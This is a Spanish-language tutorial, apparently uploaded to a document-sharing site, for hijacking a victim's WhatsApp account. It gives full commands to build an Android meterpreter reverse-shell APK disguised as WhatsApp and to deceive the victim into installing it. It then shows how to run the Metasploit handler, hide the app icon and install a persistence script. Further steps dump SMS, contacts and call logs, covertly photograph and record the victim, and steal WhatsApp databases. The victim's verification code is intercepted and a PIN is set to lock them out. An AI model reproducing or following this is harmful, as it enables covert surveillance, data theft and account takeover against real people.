Hackwhatsapp.txt

  • Uploaded by: BENYAMIN BECKHAM
  • 0
  • 0
  • February 2021
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Hackwhatsapp.txt as PDF for free.

More details

  • Words: 3,040
  • Pages: 9
Loading documents preview...
HOLA AMIG@, ESTE ES UN MÉTODO DE COMO ROBAR UNA CUENTA DE WHATSAPP USANDO UN PAYLOAD, TEN EN CUENTA QUE ESTA INFORMACIÓN ES RECOLECTADA DE DISTINTOS SITIOS WEB Y VIDEOS TUTORIALES DE YOUTUBE, NO SOY EL CREADOR DE DICHAS HERRAMIENTAS, NI MUCHO MENOS DUEÑO DE LOS CANALES DE YOUTUBE PERO ME DI EL TRABAJO DE JUNTAR TODA ESTA INFORMACIÓN Y TENER UN METODO CLARO Y SENCILLO DE ROBAR UNA CUENTA DE WHATSAPP, SI ESTAS INTERESADO EN APRENDER, LEE ESTE TEXTO HASTA EL FINAL. ANTES DE EMPEZAR QUIERO ACLARAR QUE PARA ESTE MÉTODO DEBES CONTAR COMO MÍNIMO CON 4.5GB DE ALMACENAMIENTO INTERNO EN TU DISPOSITIVO ANDROID, SI NO DISPONES DE ESE ESPACIO EN TU ALMACENAMIENTO INTERNO... LASTIMOSAMENTE ESTE MÉTODO NO ES PARA TI. MUY BIEN, ACLARADO TODO ESTO...  ¡EMPEZEMOS! Ir a Play Store e Instalar la aplicación llamada "Termux". Una vez instalada, abrir Termux y esperar un momento hasta que se instalen los paquetes necesarios para usarse. Dentro de termux, escribir los siguientes comandos... Cabe aclarar que después de escribir cada comando en Termux tienes que pulsar la tecla Enter y si en la instalación de cualquier paquete te hacen una pregunta asi [Y/N] deberas responder de forma afirmativa con la letra ( y ) sin los parentesis y después pulsar Enter, estos son los comandos: apt update && apt upgrade -y termux-setup-storage El primer comando que escribiste busca actualizaciones en termux y si las encuentra las instala. El segundo comando que escribiste otorga permisos de almacenamiento a Termux para que puedas acceder a las herramientas y carpetas que instalaras a continuación. Muy bien, a continuación instalaras un laboratorio llamado i-Haklab que pesa alrededor de 3.8GB, Esto puede tardar horas dependiendo de la velocidad de tu conexión a internet, se paciente e instala correctamente este laboratorio, a continuación te dejare los pasos y comandos de instalación. Salir de Termux un momento. Descargar el script Ivam3-Haklab desde el siguiente enlace: http://www.mediafire.com/file/5keu1mt4mkpq61c/ivam3-Haklab/file Regresar a Termux y escribir los siguientes comandos: ls /sdcard/Download/ mv /sdcard/Download/Ivam3-Haklab $HOME chmod 777 Ivam3-Haklab unset LD_PRELOAD ./Ivam3-Haklab Con estos comandos instalaras i-Haklab, si tienes problemas con su instalación, aqui te dejo un video tutorial de su instalación: https://youtu.be/jue-wKI2pKk Una vez instalado el laboratorio i-Haklab escribiremos el siguiente comando:

apt update && apt upgrade -y Al instalar el laboratorio i-Haklab, este tiene un error al instalar MetasploitFramework y con el comando usado lo solucionaras. A continuación cerrar la aplicación Termux desde la barra de notificaciones en el boton que dice [exit] Ir al Navegador de Google Chrome (OJO, DEBE SER ESTE NAVEGADOR) Pulsar en los 3 puntos que estan en la parte superior derecha del navegador de Google Chrome y seleccionar la opción que dice: [Sitio de Escritorio] Ingresar a la pagina: portmap.io Pulsar en el boton [SIGN-IN] para crear una cuenta de portmap En el recuadro que dice [Login] escribir un Apodo, (El que tu quieras). En el recuadro que dice [E-Mail-Address] escribir un correo electronico tuyo al que puedas ingresar. En el recuadro que dice [Password] escribir una contraseña, (La que tu quieras). En el recuadro que dice [Confirm Password] escribir la misma contraseña que escribiste anteriormente. Desmarcar el visto de la casilla que dice:  [  ] I agree to receive newsletters from portmap.io Marcar la casilla que dice:  [√] I agree to the terms of services Para completar el registro pulsar en [+Register] Ahora tendras que verificar tu correo electrónico que utilizaste para registrarte en portmap, para realizarlo deberas entrar en tu correo electrónico y pulsar en el enlace de verificación que te llegara a tu bandeja de mensajes. Regresar a la página portmap.io y ya estaras dentro de tu cuenta portmap. Pulsar en el botón que dice [Configuration] Pulsar en [Create New Configuration] En el espacio que dice [Name] escribir cualquier nombre. En el espacio que dice [Typ] seleccionar la opción [OpenVPN]. En el espacio que dice [Pro] seleccionar el protocolo [tcp]. Pulsar en el botón [Generate]. Después de generar el archivo pulsar en [Download] para descargar el archivo que después sera usado en una App. (OJO) Solo se puede descargar desde Google Chrome. Pulsar en el botón [Create] Muy bien, Acabas de crear tu propia configuración que sera necesaria para crear tus

PayLoads. Pulsar en el botón que dice [MAPPING RULES]. Pulsar en [Create New Rules]. Seleccionar la opción [Portmap.io] En el espacio que dice [Port on your PC] escribir cualquier puerto local, en mi caso es [8080]. Pulsar en [Create]. Por lo general aqui en este paso se genera un error, en el caso de que no se haya creado tu servidor y te haya dado error, tendras que volver a cargar la página, seleccionar de nuevo la opción [Portmap.io] escribir tu puerto local [8080] y pulsar en [Create]. Muy bien, hasta aquí ya tienes creado un servidor el cual servira para acceder al dispositivo de la victima en cualquier lugar que se encuentre, toma nota de los datos creados. EJEMPLO: termuxhacking-56371.portmap.io 56371 A CONTINUACIÓN: Salir del navegador y entrar a Play Store e instalar la aplicación llamada "OpenVPN Connect - Fast & Safe SSL VPN Client". Abrir la aplicación [OpenVPN] Pulsar en el botón [AGREE] que aparecera cuando abras la aplicación. Pulsar en el botón que dice [FILE] y buscar el archivo descargado de Google Chrome, por lo general este archivo se encuentra en la carpeta Download de la memoria interna de tu dispositivo android. Seleccionar el archivo y pulsar en el botón [Import]. Aqui aparece la dirección IP de tu conexión del servidor con otras palabras. Borrar las demas palabras y solo dejar la dirección IP. Pulsar en el botón [ADD]. Pulsar en el círculo de la parte superior izquierda de la pantalla para encender nuestra conexión VPN. Te pedira permisos para encender la conexión, para darle los permisos deberas pulsar en el botón [Permitir] y esperar unos segundos hasta que nuestra conexión este encendida. AHORA QUE YA TIENES LA CONEXIÓN ENCENDIDA REALIZA LOS SIGUIENTES PASOS: Salir de [OpenVPN] Pero no cerrar la Aplicación. Entrar a Termux, actualizar sus paquetes y crear un PayLoad con los siguientes

comandos. apt update && apt upgrade -y msfvenom -p android/meterpreter/reverse_tcp LHOST=termuxhacking-56371.portmap.io LPORT=56371 R > /sdcard/Whatsapp.apk AQUI YA ESTARÍA CREADO EL PAYLOAD, TEN EN CUENTA QUE EL COMANDO PARA CREAR EL PAYLOAD ESTA CREADO CON LOS DATOS DE MI CONEXIÓN, TU DEBERAS PONER LOS DATOS DE TU CONEXIÓN, TUS DATOS LO PUEDES ENCONTRAR EN EL PASO QUE TE DIJE QUE TOMES NOTA DE TUS DATOS CREADOS, REEMPLAZA MIS DATOS CON TUS DATOS EN LA PARTE QUE DICE: [ LHOST= ] Y EN LA PARTE QUE DICE [ LPORT= ] POR LO DEMAS COPIA TODO NORMALMENTE. Muy bien, ahora que ya esta creado tu PayLoad, deberas enviarlo a la víctima y de alguna manera con alguna excusa engañarl@ para que lo instale y lo abra por lo menos una vez, el PayLoad se encuentra en la memoria interna de tu dispositivo android con un nombre de "Whatsapp.apk". Una vez que la víctima ya haya instalado la aplicación y la haya abierto por lo menos una vez, tu tendras acceso a toda la información de su dispositivo, esto incluye (Cámara frontal, Cámara trasera, Micrófono, Mensajes de Texto, Contactos, Registro de llamadas, Aplicaciones, Fotos, Vídeos, Pdf, Carpetas, Música, Documentos entre otros archivos). Para acceder a esta información sigue estos pasos: Abrir Termux y ejecutar la consola de Metasploit-Framework para hacerlo escribe los siguientes comandos: msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost termuxhacking-56371.portmap.io set lport 8080 exploit TEN EN CUENTA QUE LA CONSOLA DE METASPLOIT-FRAMEWORK TAMBIÉN ESTA SIENDO EJECUTADA CON MIS DATOS, TU DEBERAS REEMPLAZAR MIS DATOS CON TUS DATOS EN LA PARTE QUE DICE: set lhost POR LO DEMAS COPIA TODO NORMALMENTE. A continuación despues de ejecutar esos comandos, deberas esperar un momento hasta que la consola pueda acceder al dispositivo de la víctima, esto dura unos segundos hasta que sale esta palabra: [meterpreter >] Una vez que ya estes dentro del dispositivo de la víctima realizaremos uno de los ultimos pasos que sirve para que la aplicación desaparezca del dispositivo de la víctima y para que puedas acceder al dispositivo de la víctima en cualquier momento, despues te explicare como acceder a la información de la víctima, primero debes tener todo listo para que la víctima no sospeche del Hack. Bien, en la sesión de meterpreter escribir los siguientes comandos: hide_app_icon Con este comando, el icono de la aplicación en la pantalla del dispositivo de la

víctima desaparecera y ya no lo podra desinstalar a menos que lo desisntale desde Ajustes, ahora sigue con los pasos: Salir de Termux un momento, NO cierres su ventana de recientes. Descargar el siguiente archivo que servira para poder acceder al dispositivo de la víctima en cualquier momento. Descargalo desde el siguiente enlace: http://www.mediafire.com/file/i3tni492djkjq4c/per.sh/file Una vez descargado el archivo, deberas salir del navegador y volver a termux desde las ventanas recientes y escribir los siguientes comandos en la sesión de meterpreter. upload /sdcard/download/per.sh shell sh per.sh Ctrl + c y exit exit Perfecto, si has seguido correctamente los pasos uno por uno hasta llegar aqui te Felicito, Ya tienes el control total del dispositivo de la víctima, ahora para que hagas la prueba te recomiendo que cierres todas tus aplicaciones y apagues la conexión de la aplicación [OpenVPN] pulsando en el círculo que se encuentra en la parte superior izquierda dentro de la aplicación, una vez apagada la conexión, si deseas puedes cerrar la aplicación y apagar tu [Wi-Fi] solo para que compruebes que podras acceder al dispositivo de la víctima cuando tu quieras y para que veas que no hay problema de que se pierda el control cuando apagas tu conexión a internet. Una vez que hayas hecho todo lo que te dije te explicare el procedimiento que deberas realizar para acceder al dispositivo de la víctima en cualquier momento, pon atención aqui porque estos seran los pasos que siempre usaras cuando quieras acceder al dispositivo de la víctima, muy bien dicho todo esto ahora sigue estos pasos: Encender tu red [Wi-Fi]. Abrir la aplicación [OpenVPN]. Encender tu conexión VPN pulsando en el círculo que se encuentra en la parte superior izquierda de la pantalla. Salir de [OpenVPN] pero no cerrar su pestaña de recientes. Abrir Termux, actualizar sus paquetes, ejecutar la consola de metasploit-framework y acceder a su dispositivo, para hacerlo escribe los siguientes comandos: apt update && apt upgrade -y msfconsole use exploit/multi/handler

set payload android/meterpreter/reverse_tcp set lhost termuxhacking-56371.portmap.io set lport 8080 exploit TEN EN CUENTA QUE LA CONSOLA DE METASPLOIT-FRAMEWORK TAMBIÉN ESTA SIENDO EJECUTADA CON MIS DATOS, TU DEBERAS REEMPLAZAR MIS DATOS CON TUS DATOS EN LA PARTE QUE DICE: set lhost POR LO DEMAS COPIA TODO NORMALMENTE. Muy bien, una vez que hayas escrito todos estos comandos solo deberas esperar unos segundos hasta que accedas al dispositivo y estes en la sesión de [meterpreter >]. SI TUVISTE PROBLEMAS HASTA AQUÍ, TE DEJARE UN ENLACE DE UN VIDEO QUE MUESTRA EL PROCESO DE ESTE TEXTO HASTA AQUI: https://drive.google.com/file/d/1BMa4QvxKmBvhYfUwPqV63q7mxuZ4k9cN/view?usp=drivesdk Ahora te enseñare a acceder a la información del dispositivo de la víctima, puedes usar el siguiente comando como ayuda para que mires todas las opciones que te ofrece [meterpreter=>], escribe el siguiente comando: help Aqui puedes ver todas las funciones que tienes, te enseñare los comandos mas importantes uno por uno para que entiendas como usar [meterpreter >], muy bien, pon mucha atención para que accedas a la información correctamente. Los comandos que te voy a explicar son: sysinfo Este comando te permite ver la versión android del dispositivo de la víctima. dump_calllog -o /sdcard/download/llamadas.txt Este comando crea un archivo en formato .txt sobre todo el registro de llamadas del dispositivo de la víctima y lo guarda en la carpeta Download de tu memoria interna. dump_contacts -o /sdcard/download/contactos.txt Este comando crea un archivo en formato .txt sobre todos los contactos del dispositivo de la víctima y lo guarda en la carpeta Download de tu memoria interna. dump_sms -o /sdcard/download/sms.txt Este comando crea un archivo en formato .txt sobre todos los mensajes de texto del dispositivo de la víctima y lo guarda en la carpeta Download de tu memoria interna. hide_app_icon Este comando oculta el icono de tu payload para que no se muestre en la pantalla principal del dispositivo de la víctima. webcam_snap -i 1 -p /sdcard/download/foto.jpeg

Este comando toma una foto a travez de la Cámara trasera del android de la víctima y la guarda en la carpeta Download de tu memoria interna. webcam_snap -i 2 -p /sdcard/download/foto.jpeg Este comando toma una foto a travez de la Cámara frontal del android de la víctima y la guarda en la carpeta Download de tu memoria interna. record_mic -d 15 -f /sdcard/download/grabacion.wav Este comando graba un audio de 15 segundos desde el android de la víctima y lo guarda en la carpeta Download de tu memoria interna. set_audio_mode -m 0 Este comando cambia el estado de vibración o sonido a silencio en el dispositivo de la víctima. Muy bien, estos no son todos los comandos pero si son los mas importantes, si quieres ver los demas comandos te dejare un enlace donde te redireccionara a Mega y de ahi deberas descargar un PDF que contiene todos los comandos de meterpreter mas detallados, Este es el enlace: https://mega.nz/#!nq5AhY5I!WsiGUSW5qKcTwJDJTS641L137XPu6IAGbUj2S3HRyY Ahora que ya sabes para que sirve cada comando, te enseñare a robar la cuenta de whatsapp de la víctima, para ello en la sesión de meterpreter deberas escribir los siguientes comandos: cd /sdcard/WhatsApp/Databases Después de poner este comando estaras dentro de la carpeta Databases del dispositivo de la víctima, ahora deberas descargar todos los Databases si quieres tener acceso a sus conversaciones de whatsapp, para descargar sus databases deberas poner el siguiente comando y los databases de la víctima: download nombre de los databases /sdcard Muy bien, después de que los Databases hayan sido descargados, sal un momento de termux sin cerrar su ventana de recientes y después dirigete a la Play Store y descarga la aplicación [Parashell Space Multi Cuentas], esta aplicación te servira para abrir el whatsapp hackeado dentro de ella, ademas de eso deberas descargar un explorador de archivos, si no tienes un explorador de archivos aqui te dejare uno para que lo descargues: https://mega.nz/#!v7o3RADB! wqRPgg3ssysDhnd6drMpB2Ii8DFjbFtudTsKGuicWEU Una vez que ya tengas [Es explorador de archivos pro] y [Parashell Space Multi Cuentas] instalados, sigue estos pasos: Abrir [Parashell Space Multi Cuentas] darle todos los permisos que te pida a la aplicación y clonar la aplicación de Whatsapp. Una vez que hayas clonado la aplicación de Whatsapp entra a ella y sigue estos pasos: Pulsar en [Aceptar y Continuar] cuando ya estes dentro del whatsapp clonado. Salir un momento de [Parashell Space Multi Cuentas] pero no borres su pestaña de recientes.

Abrir [Es Explorador de Archivos Pro] (El que acabas de descargar). Copiar todos los Databases descargados en la siguiente carpeta, para entrar a dicha carpeta sigue estos pasos: Buscar y entrar a la carpeta llamada [parallel_intl]. Dentro de la carpeta [parallel_intl] entrar a la carpeta llamada [ 0 ]. Dentro de la carpeta llamada [ 0 ] entrar a la carpeta llamada [WhatsApp]. Por ultimo, dentro de la carpeta llamada [WhatsApp] crear la carpeta con el siguiente nombre [Databases] y pegar los Databases en esa carpeta. Ahora sal un momento del explorador de archivos, vuelve a entrar en termux y en la sesión de meterpreter escribe el siguiente comando: set_audio_mode -m 0 Este comando servira para que la víctima no se percate del sonido de la notificación del mensaje de texto que se lo enviaremos a continuación. Ahora deberas salir de termux un momento sin cerrar sus pestañas de recientes y seguir estos pasos: Abrir la aplicación [Parashell Space Multi Cuentas] y escribir el número de teléfono de la víctima en el whatsapp clonado y pulsar en el botón que dice [SIG.] y despues pulsar en la opción que dice [OK]. Te dira que escribas el código de verificación que se enviara a el número que escribiste anteriormente y para poder ver ese código sigue estos pasos: Salir de [Parashell Space Multi Cuentas] por un momento sin cerrar su pestaña de recientes. Abrir Termux nuevamente y escribir los siguientes comandos dentro de la sesión de meterpreter: dump_sms -o /sdcard/download/sms.txt Una vez escrito este comando, se creara un archivo llamado sms.txt y este se encuentra en la carpeta Download de tu almacenamiento interno, para entrar en el sigue estos pasos: Cierra [Termux] completamente desde la barra de notificaciones en el botón que dice [exit]. Entrar a [Es Explorador de Archios Pro]. Buscar y entrar en la carpeta [Download]. Buscar y abrir el archivo [sms.txt]. Dentro del archivo busca el mensaje donde se encuentra el código de verificación y copialo. Salir de [Es Explorador de Archivos Pro].

Entrar a [Parashell Space Multi Cuentas] desde las ventanas recientes. Pegar el Código de Verificación que copiaste en la aplicación clonada de whatsapp. Pulsar en [Restaurar] para obtener los chats de whatsapp de la víctima. Pulsar en [SIG.]. Escribir un nombre (El que tu quieras) y pulsar en [SIG.] Muy bien, aqui ya estamos dentro de la cuenta de whatsapp de la víctima, ahora vamos a realizar el ultimo paso para apoderarnos de la cuenta de la víctima y que esta ya no pueda recuperarla, para hacerlo sigue estos pasos: Pulsar en los [3 puntos] que se encuentran en la parte superior derecha de la pantalla de whatsapp. Pulsar en [Ajustes]. Pulsar en [Cuenta]. Pulsar en [Verificación en dos pasos]. Pulsar en [Activar]. Escribir un PIN de 6 dígitos que servira para que la víctima no recupere su cuenta de whatsapp, (El que tu quieras). Pulsar en [SIG.]. Vuelve a Escribir tu PIN de 6 dígitos que escribiste anteriormente para confirmarlo. Pulsar en [SIG.]. Pulsar en [Omitir]. Y LISTO, CON ESTO TERMINA ESTE TEXTO, EL WHATSAPP ES COMPLETAMENTE TUYO, TU DECIDES SI REGRESARLE O NO EL WHATSAPP A LA VÍCTIMA. SI SE TE DIFICULTÓ ALGUN PASO TE RECOMIENDO QUE MIRES ESTE VIDEO, QUE MUESTRA ALGUNOS DE LOS PASOS INDICADOS EN ESTE TEXTO: https://drive.google.com/file/d/19JdmW7fH5-Q4BHRgLqFxjG3-8B8nF9OM/view? usp=drivesdk RECUERDA USAR ESTA INFORMACIÓN ADECUADAMENTE, TU ERES RESPONSABLE DE LO QUE HACES. REPITO, ESTA ES INFORMACIÓN ES RECOLECTADA DE DISTINTOS SITIOS WEB Y TUTORIALES DE YOUTUBE, DEJARE LOS CANALES DE YOUTUBE DE LOS ENLACES DE LOS VIDEOS MOSTRADOS EN ESTE TEXTO. Canales de YouTube: Informática y Hacking https://www.youtube.com/channel/UCd5n5V06sYUXmWnDTZo7UGQ Ivam3byCinderella https://www.youtube.com/channel/UCVc5r22k1Tpow8LgBu-z4tg

More Documents from "BENYAMIN BECKHAM"

Hackwhatsapp.txt
February 2021 1
Bell's Palsy
January 2021 0